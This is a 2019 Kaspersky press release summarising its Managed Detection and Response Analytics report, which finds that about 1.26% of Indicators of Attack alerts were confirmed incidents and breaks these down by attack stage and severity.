Kaspersky Research Finds 1% of IoAs are Targeted Attacks

Woburn, MA – October 8, 2019 – According to Kaspersky’s Managed Detection and Response Analytics report, in the first half of 2019, only 1.26% of Indicators of Attack (IoA) alerts on endpoint devices were identified as cybersecurity incidents. Of the 40,806 alerts generated via IoAs, only 515 resulted in detected incidents. The results uncovered that most of these incidents were related to sophisticated targeted attacks that use “living off the land” techniques deployed by threat actors to hide malicious activity within legitimate user and administrator behavior.

Unlike Indicators of Compromise (IoC) detection methods, IoAs allow attack identification based on the ways particular threat actors tend to attack their victims including tactics, techniques and procedures. With “living of the land” attack techniques becoming more popular, IoA detection methods are proving to be the most effective. This is confirmed by additional report findings based on multiple levels of analysis of results from Kaspersky Managed Protection Service provided by several organizations from sectors including financial, governmental, industrial and transportation as well as IT and telecom.

While cybersecurity incidents were identified in almost all tactics of the cyber-kill chain, the greatest number of attacks were found in the stages where the likelihood of false positives is relatively higher including execution (37%), defense evasion (31%), lateral movement (16%) and impact (16%). When combating these tactics, the research found that Endpoint Protection Products (EPP) are an effective threat response tool for 97% of the incidents identified. 47% of these classified as medium severity including malware such as Trojans and Cryptors, and 50% at low severity including unwanted programs such as adware or riskware.

When it comes to advanced and unknown threats, or those classified as high severity (3%), traditional EPP solutions alone are less effective. These type of threats, including targeted attacks or complex malware who utilize “living off the land” tactics, require an additional level of TPP-based detection, manual threat hunting and analysis.

“One of the key takeaways of our Managed Detection and Response Analysis we have worked on in the last six months, is that if you don’t see a large number of false-positive events in your network, that probably means that you are missing a lot of important security incidents,” said Sergey Soldatov, head of security operation center at Kaspersky. “Therefore, you should switch towards more wide-scale usage of Indicators of Attack methods, among other tools. While IoA-based alerts are much trickier to investigate due to the necessity to perform a lot of research to create efficient IoA and then a lot of manual analysis (when the IoA are triggered), our statistics show that these are most prone to false positives yet, they are the most effective and allow you to find really critical incidents.”

For more information about the Managed Detection and Response Analytics report, or how Kaspersky Managed Protection can help your business, please visit Securelist.com

About Kaspersky

Kaspersky is a global cybersecurity company founded in 1997. Kaspersky’s deep threat intelligence and security expertise is constantly transforming into innovative security solutions and services to protect businesses, critical infrastructure, governments and consumers around the globe. The company’s comprehensive security portfolio includes leading endpoint protection and a number of specialized security solutions and services to fight sophisticated and evolving digital threats. Over 400 million users are protected by Kaspersky technologies and we help 270,000 corporate clients protect what matters most to them. Learn more at usa.kaspersky.com.

Media Contact:
Cassandra Faro
Cassandra.Faro@Kaspersky.com
781-503-1812